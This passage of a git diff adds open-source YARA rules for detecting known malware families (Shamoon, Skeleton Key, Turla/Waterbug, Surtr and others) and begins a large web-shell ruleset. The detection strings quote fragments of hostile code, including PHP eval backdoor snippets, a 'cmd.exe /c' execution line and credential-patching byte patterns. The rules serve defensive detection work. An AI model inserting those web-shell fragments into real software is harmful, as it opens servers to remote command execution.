+ $code1 = {66 83 F? 2C 74 0C 66 83 F? 3B 74 06 66 83 F? 7C 75 05}
+
+ // .text:10001D83 83 F8 09 cmp eax, 9 ; switch 10 cases
+ // .text:10001D86 0F 87 DB 00 00 00 ja loc_10001E67 ; jumptable 10001D8C default case
+ // .text:10001D8C FF 24 85 55 1F 00+ jmp ds:off_10001F55[eax*4] ; switch jump
+ $code2 = {83 F? 09 0F 87 ?? 0? 00 00 FF 24}
+
+ $str1 = "IP_PADDING_DATA" wide ascii
+ $str2 = "PORT_NUM" wide ascii
+
+ condition:
+ all of them
+}
diff --git a/malware/ShadowTech.yar b/malware/ShadowTech.yar
new file mode 100644
index 0000000..a399b2d
--- /dev/null
+++ b/malware/ShadowTech.yar
@@ -0,0 +1,23 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ShadowTech
+{
+ meta:
+ description = "ShadowTech RAT"
+ author = "botherder https://github.com/botherder"
+
+ strings:
+ $string1 = /\#(S)trings/
+ $string2 = /\#(G)UID/
+ $string3 = /\#(B)lob/
+ $string4 = /(S)hadowTech Rat\.exe/
+ $string5 = /(S)hadowTech_Rat/
+
+ condition:
+ all of them
+}
diff --git a/malware/Shamoon.yar b/malware/Shamoon.yar
new file mode 100644
index 0000000..f4eb7fc
--- /dev/null
+++ b/malware/Shamoon.yar
@@ -0,0 +1,20 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule CrowdStrike_Shamoon_DroppedFile {
+ meta:
+ description = "Rule to detect Shamoon malware http://goo.gl/QTxohN"
+ reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf"
+ strings:
+ $testn123 = "test123" wide
+ $testn456 = "test456" wide
+ $testn789 = "test789" wide
+ $testdomain = "testdomain.com" wide $pingcmd = "ping -n 30 127.0.0.1 >nul" wide
+ condition:
+ (any of ($testn*) or $pingcmd) and $testdomain
+}
diff --git a/malware/Skeleton.yar b/malware/Skeleton.yar
new file mode 100644
index 0000000..84bd218
--- /dev/null
+++ b/malware/Skeleton.yar
@@ -0,0 +1,49 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule skeleton_key_patcher
+{
+ meta:
+ description = "Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN"
+ author = "Dell SecureWorks Counter Threat Unit"
+ reference = "http://goo.gl/aAk3lN"
+ date = "2015/01/13"
+ score = 70
+ strings:
+ $target_process = "lsass.exe" wide
+ $dll1 = "cryptdll.dll"
+ $dll2 = "samsrv.dll"
+
+ $name = "HookDC.dll"
+
+ $patched1 = "CDLocateCSystem"
+ $patched2 = "SamIRetrievePrimaryCredentials"
+ $patched3 = "SamIRetrieveMultiplePrimaryCredentials"
+ condition:
+ all of them
+}
+
+rule skeleton_key_injected_code
+{
+ meta:
+ description = "Skeleton Key injected Code http://goo.gl/aAk3lN"
+ author = "Dell SecureWorks Counter Threat Unit"
+ reference = "http://goo.gl/aAk3lN"
+ date = "2015/01/13"
+ score = 70
+ strings:
+ $injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 }
+
+ $patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 }
+
+ $patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
+
+ $patch_SamIRetrieveMultiplePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
+
+ condition:
+ any of them
+}
diff --git a/malware/Stealer.yar b/malware/Stealer.yar
new file mode 100644
index 0000000..2c3ffe4
--- /dev/null
+++ b/malware/Stealer.yar
@@ -0,0 +1,23 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule universal_1337_stealer_serveur : Stealer
+{
+ meta:
+ author="Kevin Falcoz"
+ date="24/02/2013"
+ description="Universal 1337 Stealer Serveur"
+
+ strings:
+ $signature1={2A 5B 53 2D 50 2D 4C 2D 49 2D 54 5D 2A} /*[S-P-L-I-T]*/
+ $signature2={2A 5B 48 2D 45 2D 52 2D 45 5D 2A} /*[H-E-R-E]*/
+ $signature3={46 54 50 7E} /*FTP~*/
+ $signature4={7E 31 7E 31 7E 30 7E 30} /*~1~1~0~0*/
+
+ condition:
+ $signature1 and $signature2 or $signature3 and $signature4
+}
diff --git a/malware/Surtr.yar b/malware/Surtr.yar
new file mode 100644
index 0000000..bd350f7
--- /dev/null
+++ b/malware/Surtr.yar
@@ -0,0 +1,138 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RSharedStrings : Surtr Family {
+ meta:
+ description = "identifiers for remote and gmremote"
+ author = "Katie Kleemola"
+ last_updated = "07-21-2014"
+
+ strings:
+ $ = "nView_DiskLoydb" wide
+ $ = "nView_KeyLoydb" wide
+ $ = "nView_skins" wide
+ $ = "UsbLoydb" wide
+ $ = "%sBurn%s" wide
+ $ = "soul" wide
+
+ condition:
+ any of them
+
+}
+
+rule RemoteStrings : Remote Variant Surtr Family {
+ meta:
+ description = "indicators for remote.dll - surtr stage 2"
+ author = "Katie Kleemola"
+ last_updated = "07-21-2014"
+
+ strings:
+ $ = "\x00Remote.dll\x00"
+ $ = "\x00CGm_PlugBase::"
+ $ = "\x00ServiceMain\x00_K_H_K_UH\x00"
+ $ = "\x00_Remote_\x00" wide
+ condition:
+ any of them
+}
+
+rule GmRemoteStrings : GmRemote Variant Family Surtr {
+ meta:
+ description = "identifiers for gmremote: surtr stage 2"
+ author = "Katie Kleemola"
+ last_updated = "07-21-2014"
+
+ strings:
+ $ = "\x00x86_GmRemote.dll\x00"
+ $ = "\x00D:\\Project\\GTProject\\Public\\List\\ListManager.cpp\x00"
+ $ = "\x00GmShutPoint\x00"
+ $ = "\x00GmRecvPoint\x00"
+ $ = "\x00GmInitPoint\x00"
+ $ = "\x00GmVerPoint\x00"
+ $ = "\x00GmNumPoint\x00"
+ $ = "_Gt_Remote_" wide
+ $ = "%sBurn\\workdll.tmp" wide
+
+ condition:
+ any of them
+
+}
+
+
+rule GmRemote : Family Surtr Variant GmRemote {
+ meta:
+ description = "identifier for gmremote"
+ author = "Katie Kleemola"
+ last_updated = "07-25-2014"
+
+ condition:
+ RSharedStrings and GmRemoteStrings
+}
+
+rule Remote : Family Surtr Variant Remote {
+ meta:
+ description = "identifier for remote"
+ author = "Katie Kleemola"
+ last_updated = "07-25-2014"
+
+ condition:
+ RSharedStrings and RemoteStrings
+}
+
+rule SurtrStrings : Surtr Family {
+ meta:
+ author = "Katie Kleemola"
+ description = "Strings for Surtr"
+ last_updated = "2014-07-16"
+
+ strings:
+ $ = "\x00soul\x00"
+ $ = "\x00InstallDll.dll\x00"
+ $ = "\x00_One.dll\x00"
+ $ = "_Fra.dll"
+ $ = "CrtRunTime.log"
+ $ = "Prod.t"
+ $ = "Proe.t"
+ $ = "Burn\\"
+ $ = "LiveUpdata_Mem\\"
+
+ condition:
+ any of them
+
+}
+
+rule SurtrCode : Surtr Family {
+ meta:
+ author = "Katie Kleemola"
+ description = "Code features for Surtr Stage1"
+ last_updated = "2014-07-16"
+
+ strings:
+ //decrypt config
+ $ = { 8A ?? ?? 84 ?? ?? 74 ?? 3C 01 74 ?? 34 01 88 41 3B ?? 72 ?? }
+ //if Burn folder name is not in strings
+ $ = { C6 [3] 42 C6 [3] 75 C6 [3] 72 C6 [3] 6E C6 [3] 5C }
+ //mov char in _Fire
+ $ = { C6 [3] 5F C6 [3] 46 C6 [3] 69 C6 [3] 72 C6 [3] 65 C6 [3] 2E C6 [3] 64 }
+
+ condition:
+ any of them
+
+}
+
+rule Surtr : Family {
+ meta:
+ author = "Katie Kleemola"
+ description = "Rule for Surtr Stage One"
+ last_updated = "2014-07-16"
+
+ condition:
+ SurtrStrings or SurtrCode
+
+}
+
+
+
diff --git a/malware/T5000.yar b/malware/T5000.yar
new file mode 100644
index 0000000..cbbabdc
--- /dev/null
+++ b/malware/T5000.yar
@@ -0,0 +1,44 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule T5000Strings : T5000 Family
+{
+ meta:
+ description = "T5000 Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-26"
+
+ strings:
+ $ = "_tmpR.vbs"
+ $ = "_tmpg.vbs"
+ $ = "Dtl.dat" wide ascii
+ $ = "3C6FB3CA-69B1-454f-8B2F-BD157762810E"
+ $ = "EED5CA6C-9958-4611-B7A7-1238F2E1B17E"
+ $ = "8A8FF8AD-D1DE-4cef-B87C-82627677662E"
+ $ = "43EE34A9-9063-4d2c-AACD-F5C62B849089"
+ $ = "A8859547-C62D-4e8b-A82D-BE1479C684C9"
+ $ = "A59CF429-D0DD-4207-88A1-04090680F714"
+ $ = "utd_CE31" wide ascii
+ $ = "f:\\Project\\T5000\\Src\\Target\\1 KjetDll.pdb"
+ $ = "l:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdb"
+ $ = "f:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdb"
+ $ = "E:\\VS2010\\xPlat2\\Release\\InstRes32.pdb"
+
+ condition:
+ any of them
+}
+
+rule T5000 : Family
+{
+ meta:
+ description = "T5000"
+ author = "Seth Hardy"
+ last_modified = "2014-06-26"
+
+ condition:
+ T5000Strings
+}
diff --git a/malware/Turla.yar b/malware/Turla.yar
new file mode 100644
index 0000000..3d70cbf
--- /dev/null
+++ b/malware/Turla.yar
@@ -0,0 +1,21 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WaterBug_turla_dll
+{
+ meta:
+ description = "Symantec Waterbug Attack - Trojan Turla DLL"
+ author = "Symantec Security Response"
+ date = "22.01.2015"
+ reference = "http://t.co/rF35OaAXrl"
+
+ strings:
+ $a = /([A-Za-z0-9]{2,10}_){,2}Win32\.dll\x00/
+
+ condition:
+ pe.exports("ee") and $a
+}
diff --git a/malware/Urausy.yar b/malware/Urausy.yar
new file mode 100644
index 0000000..dc4832f
--- /dev/null
+++ b/malware/Urausy.yar
@@ -0,0 +1,21 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule urausy_skype_dat {
+ meta:
+ author = "AlienVault Labs"
+ description = "Yara rule to match against memory of processes infected by Urausy skype.dat"
+ strings:
+ $a = "skype.dat" ascii wide
+ $b = "skype.ini" ascii wide
+ $win1 = "CreateWindow"
+ $win2 = "YIWEFHIWQ" ascii wide
+ $desk1 = "CreateDesktop"
+ $desk2 = "MyDesktop" ascii wide
+ condition:
+ $a and $b and (all of ($win*) or all of ($desk*))
+}
diff --git a/malware/Vidgrab.yar b/malware/Vidgrab.yar
new file mode 100644
index 0000000..eb04fee
--- /dev/null
+++ b/malware/Vidgrab.yar
@@ -0,0 +1,53 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule VidgrabCode : Vidgrab Family
+{
+ meta:
+ description = "Vidgrab code tricks"
+ author = "Seth Hardy"
+ last_modified = "2014-06-20"
+
+ strings:
+ $divbyzero = { B8 02 00 00 00 48 48 BA 02 00 00 00 83 F2 02 F7 F0 }
+ // add eax, ecx; xor byte ptr [eax], ??h; inc ecx
+ $xorloop = { 03 C1 80 30 (66 | 58) 41 }
+ $junk = { 8B 4? ?? 8B 4? ?? 03 45 08 52 5A }
+
+ condition:
+ all of them
+}
+
+rule VidgrabStrings : Vidgrab Family
+{
+ meta:
+ description = "Vidgrab Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-20"
+
+ strings:
+ $ = "IDI_ICON5" wide ascii
+ $ = "starter.exe"
+ $ = "wmifw.exe"
+ $ = "Software\\rar"
+ $ = "tmp092.tmp"
+ $ = "temp1.exe"
+
+ condition:
+ 3 of them
+}
+
+rule Vidgrab : Family
+{
+ meta:
+ description = "Vidgrab"
+ author = "Seth Hardy"
+ last_modified = "2014-06-20"
+
+ condition:
+ VidgrabCode or VidgrabStrings
+}
diff --git a/malware/Warp.yar b/malware/Warp.yar
new file mode 100644
index 0000000..56540bf
--- /dev/null
+++ b/malware/Warp.yar
@@ -0,0 +1,48 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WarpCode : Warp Family
+{
+ meta:
+ description = "Warp code features"
+ author = "Seth Hardy"
+ last_modified = "2014-07-10"
+
+ strings:
+ // character replacement
+ $ = { 80 38 2B 75 03 C6 00 2D 80 38 2F 75 03 C6 00 5F }
+
+ condition:
+ any of them
+}
+
+rule WarpStrings : Warp Family
+{
+ meta:
+ description = "Warp Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-07-10"
+
+ strings:
+ $ = "/2011/n325423.shtml?"
+ $ = "wyle"
+ $ = "\\~ISUN32.EXE"
+
+ condition:
+ any of them
+}
+
+rule Warp : Family
+{
+ meta:
+ description = "Warp"
+ author = "Seth Hardy"
+ last_modified = "2014-07-10"
+
+ condition:
+ WarpCode or WarpStrings
+}
diff --git a/malware/Waterbug.yar b/malware/Waterbug.yar
new file mode 100644
index 0000000..8d75e46
--- /dev/null
+++ b/malware/Waterbug.yar
@@ -0,0 +1,100 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WaterBug_wipbot_2013_core_PDF {
+ meta:
+ description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF"
+ author = "Symantec Security Response"
+ date = "22.01.2015"
+ reference = "http://t.co/rF35OaAXrl"
+ strings:
+ $PDF = "%PDF-"
+ $a = /\+[A-Za-z]{1}\. _ _ \$\+[A-Za-z]{1}\. _ \$ _ \+/
+ $b = /\+[A-Za-z]{1}\.\$\$\$ _ \+/
+ condition:
+ ($PDF at 0) and #a > 150 and #b > 200
+}
+
+rule WaterBug_wipbot_2013_dll {
+ meta:
+ description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component"
+ author = "Symantec Security Response"
+ date = "22.01.2015"
+ reference = "http://t.co/rF35OaAXrl"
+ strings:
+ $string1 = "/%s?rank=%s"
+ $string2 = "ModuleStart\x00ModuleStop\x00start"
+ $string3 = "1156fd22-3443-4344-c4ffff"
+ //read file... error..
+ $string4 = "read\x20file\x2E\x2E\x2E\x20error\x00\x00"
+ condition:
+ 2 of them
+}
+
+rule WaterBug_wipbot_2013_core {
+ meta:
+ description = "Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error"
+ author = "Symantec Security Response"
+ date = "22.01.2015"
+ reference = "http://t.co/rF35OaAXrl"
+ strings:
+ $mz = "MZ"
+ $code1 = { 89 47 0C C7 47 10 90 C2 04 00 C7 47 14 90 C2 10 00 C7 47 18 90 90 60 68 89 4F 1C C7 47 20 90 90 90 B8 89 4F 24 C7 47 28 90 FF D0 61 C7 47 2C 90 C2 04 00}
+ $code2 = { 85 C0 75 25 8B 0B BF ?? ?? ?? ?? EB 17 69 D7 0D 66 19 00 8D BA 5F F3 6E 3C 89 FE C1 EE 10 89 F2 30 14 01 40 3B 43 04 72 E4}
+ $code3 = {90 90 90 ?? B9 00 4D 5A 90 00 03 00 00 00 82 04} $code4 = {55 89 E5 5D C3 55 89 E5 83 EC 18 8B 45 08 85 C0}
+ condition:
+ $mz at 0 and (($code1 or $code2) or ($code3 and $code4))
+}
+
+rule WaterBug_turla_dropper {
+ meta:
+ description = "Symantec Waterbug Attack - Trojan Turla Dropper"
+ author = "Symantec Security Response"
+ date = "22.01.2015"
+ reference = "http://t.co/rF35OaAXrl"
+ strings:
+ $a = {0F 31 14 31 20 31 3C 31 85 31 8C 31 A8 31 B1 31 D1 31 8B 32 91 32 B6 32 C4 32 6C 33 AC 33 10 34}
+ $b = {48 41 4C 2E 64 6C 6C 00 6E 74 64 6C 6C 00 00 00 57 8B F9 8B 0D ?? ?? ?? ?? ?? C9 75 26 56 0F 20 C6 8B C6 25 FF FF FE FF 0F 22 C0 E8}
+ condition:
+ all of them
+}
+
+rule WaterBug_fa_malware {
+ meta:
+ description = "Symantec Waterbug Attack - FA malware variant"
+ author = "Symantec Security Response"
+ date = "22.01.2015"
+ reference = "http://t.co/rF35OaAXrl"
+ strings:
+ $mz = "MZ"
+ $string1 = "C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdb"
+ $string2 = "d:\\proj\\cn\\fa64\\"
+ $string3 = "sengoku_Win32.sys\x00"
+ $string4 = "rk_ntsystem.c"
+ $string5 = "\\uroboros\\"
+ $string6 = "shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}"
+ condition:
+ ($mz at 0) and (any of ($string*))
+}
+
+
+rule WaterBug_sav {
+ meta:
+ description = "Symantec Waterbug Attack - SAV Malware"
+ author = "Symantec Security Response"
+ date = "22.01.2015"
+ reference = "http://t.co/rF35OaAXrl"
+ strings:
+ $mz = "MZ"
+ $code1a = { 8B 75 18 31 34 81 40 3B C2 72 F5 33 F6 39 7D 14 76 1B 8A 04 0E 88 04 0F 6A 0F 33 D2 8B C7 5B F7 F3 85 D2 75 01 }
+ $code1b = { 8B 45 F8 40 89 45 F8 8B 45 10 C1 E8 02 39 45 F8 73 17 8B 45 F8 8B 4D F4 8B 04 81 33 45 20 8B 4D F8 8B 55 F4 89 04 8A EB D7 83 65 F8 00 83 65 EC 00 EB 0E 8B 45 F8 40 89 45 F8 8B 45 EC 40 89 45 EC 8B 45 EC 3B 45 10 73 27 8B 45 F4 03 45 F8 8B 4D F4 03 4D EC 8A 09 88 08 8B 45 F8 33 D2 6A 0F 59 F7 F1 85 D2 75 07 }
+ $code1c = { 8A 04 0F 88 04 0E 6A 0F 33 D2 8B C6 5B F7 F3 85 D2 75 01 47 8B 45 14 46 47 3B F8 72 E3 EB 04 C6 04 08 00 48 3B C6 73 F7 33 C0 C1 EE 02 74 0B 8B 55 18 31 14 81 40 3B C6 72 F5 }
+ $code2 = { 29 5D 0C 8B D1 C1 EA 05 2B CA 8B 55 F4 2B C3 3D 00 00 00 01 89 0F 8B 4D 10 8D 94 91 00 03 00 00 73 17 8B 7D F8 8B 4D 0C 0F B6 3F C1 E1 08 0B CF C1 E0 08 FF 45 F8 89 4D 0C 8B 0A 8B F8 C1 EF 0B}
+ condition:
+ ($mz at 0) and (($code1a or $code1b or $code1c) and $code2)
+}
+
diff --git a/malware/Webshell-shell.yar b/malware/Webshell-shell.yar
new file mode 100644
index 0000000..90edf4f
--- /dev/null
+++ b/malware/Webshell-shell.yar
@@ -0,0 +1,7971 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Weevely_Webshell {
+ meta:
+ description = "Weevely Webshell - Generic Rule - heavily scrambled tiny web shell"
+ author = "Florian Roth"
+ reference = "http://www.ehacking.net/2014/12/weevely-php-stealth-web-backdoor-kali.html"
+ date = "2014/12/14"
+ score = 60
+ strings:
+ $php = "<?php" ascii
+ $s0 = /\$[a-z]{4} = \$[a-z]{4}\("[a-z][a-z]?",[\s]?"",[\s]?"/ ascii
+ $s1 = /\$[a-z]{4} = str_replace\("[a-z][a-z]?","","/ ascii
+ $s2 = /\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\)\)\); \$[a-z]{4}\(\);/ ascii
+ $s4 = /\$[a-z]{4}="[a-zA-Z0-9]{70}/ ascii
+ condition:
+ $php at 0 and all of ($s*) and filesize > 570 and filesize < 800
+}
+
+rule webshell_h4ntu_shell_powered_by_tsoi_ {
+ meta:
+ description = "Web Shell - file h4ntu shell [powered by tsoi].php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "06ed0b2398f8096f1bebf092d0526137"
+ strings:
+ $s0 = " <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>Server Adress:</b"
+ $s3 = " <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>User Info:</b> ui"
+ $s4 = " <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= "
+ $s5 = "<INPUT TYPE=\"text\" NAME=\"cmd\" value=\"<?php echo stripslashes(htmlentities($"
+ condition:
+ all of them
+}
+rule webshell_PHP_sql {
+ meta:
+ description = "Web Shell - file sql.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "2cf20a207695bbc2311a998d1d795c35"
+ strings:
+ $s0 = "$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_"
+ $s4 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
+ condition:
+ all of them
+}
+rule webshell_PHP_a {
+ meta:
+ description = "Web Shell - file a.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "e3b461f7464d81f5022419d87315a90d"
+ strings:
+ $s1 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\""
+ $s2 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>"
+ $s4 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p> " fullword
+ condition:
+ 2 of them
+}
+rule webshell_iMHaPFtp_2 {
+ meta:
+ description = "Web Shell - file iMHaPFtp.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "12911b73bc6a5d313b494102abcf5c57"
+ strings:
+ $s8 = "if ($l) echo '<a href=\"' . $self . '?action=permission&file=' . urlencode($"
+ $s9 = "return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA"
+ condition:
+ 1 of them
+}
+rule webshell_Jspspyweb {
+ meta:
+ description = "Web Shell - file Jspspyweb.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "4e9be07e95fff820a9299f3fb4ace059"
+ strings:
+ $s0 = " out.print(\"<tr><td width='60%'>\"+strCut(convertPath(list[i].getPath()),7"
+ $s3 = " \"reg add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control"
+ condition:
+ all of them
+}
+rule webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 {
+ meta:
+ description = "Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "49ad9117c96419c35987aaa7e2230f63"
+ strings:
+ $s0 = "die(\"\\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\\n"
+ $s1 = "Mode Shell v1.0</font></span></a></font><font face=\"Webdings\" size=\"6\" color"
+ condition:
+ 1 of them
+}
+rule webshell_SimAttacker_Vrsion_1_0_0_priv8_4_My_friend {
+ meta:
+ description = "Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "089ff24d978aeff2b4b2869f0c7d38a3"
+ strings:
+ $s2 = "echo \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo"
+ $s3 = "fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
+ condition:
+ 1 of them
+}
+rule webshell_phpshell_2_1_pwhash {
+ meta:
+ description = "Web Shell - file pwhash.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "ba120abac165a5a30044428fac1970d8"
+ strings:
+ $s1 = "<tt> </tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (pi"
+ $s3 = "word: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\","
+ condition:
+ 1 of them
+}
+rule webshell_PHPRemoteView {
+ meta:
+ description = "Web Shell - file PHPRemoteView.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "29420106d9a81553ef0d1ca72b9934d9"
+ strings:
+ $s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
+ $s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
+ condition:
+ 1 of them
+}
+rule webshell_jsp_12302 {
+ meta:
+ description = "Web Shell - file 12302.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "a3930518ea57d899457a62f372205f7f"
+ strings:
+ $s0 = "</font><%out.print(request.getRealPath(request.getServletPath())); %>" fullword
+ $s1 = "<%@page import=\"java.io.*,java.util.*,java.net.*\"%>" fullword
+ $s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+ condition:
+ all of them
+}
+rule webshell_caidao_shell_guo {
+ meta:
+ description = "Web Shell - file guo.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "9e69a8f499c660ee0b4796af14dc08f0"
+ strings:
+ $s0 = "<?php ($www= $_POST['ice'])!"
+ $s1 = "@preg_replace('/ad/e','@'.str_rot13('riny').'($ww"
+ condition:
+ 1 of them
+}
+rule webshell_PHP_redcod {
+ meta:
+ description = "Web Shell - file redcod.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "5c1c8120d82f46ff9d813fbe3354bac5"
+ strings:
+ $s0 = "H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw" fullword
+ $s1 = "HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm" fullword
+ condition:
+ all of them
+}
+rule webshell_remview_fix {
+ meta:
+ description = "Web Shell - file remview_fix.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "a24b7c492f5f00e2a19b0fa2eb9c3697"
+ strings:
+ $s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
+ $s5 = "echo \"<P><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n"
+ condition:
+ 1 of them
+}
+rule webshell_asp_cmd {
+ meta:
+ description = "Web Shell - file cmd.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "895ca846858c315a3ff8daa7c55b3119"
+ strings:
+ $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+ $s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+ $s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+ condition:
+ 1 of them
+}
+rule webshell_php_sh_server {
+ meta:
+ description = "Web Shell - file server.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 50
+ hash = "d87b019e74064aa90e2bb143e5e16cfa"
+ strings:
+ $s0 = "eval(getenv('HTTP_CODE'));" fullword
+ condition:
+ all of them
+}
+rule webshell_PH_Vayv_PH_Vayv {
+ meta:
+ description = "Web Shell - file PH Vayv.php"
